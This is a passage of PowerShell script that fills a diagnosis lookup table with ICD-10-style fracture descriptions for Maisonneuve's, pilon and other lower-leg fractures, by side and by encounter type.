$DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of unspecified leg","Displaced Maisonneuve's fracture of unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of right leg","Nondisplaced Maisonneuve's fracture of right leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of left leg","Nondisplaced Maisonneuve's fracture of left leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Maisonneuve's fracture of unspecified leg","Nondisplaced Maisonneuve's fracture of unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of right tibia","Displaced pilon fracture of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of left tibia","Displaced pilon fracture of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced pilon fracture of unspecified tibia","Displaced pilon fracture of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of right tibia","Nondisplaced pilon fracture of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of left tibia","Nondisplaced pilon fracture of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced pilon fracture of unspecified tibia","Nondisplaced pilon fracture of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right lower leg","Other fracture of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent 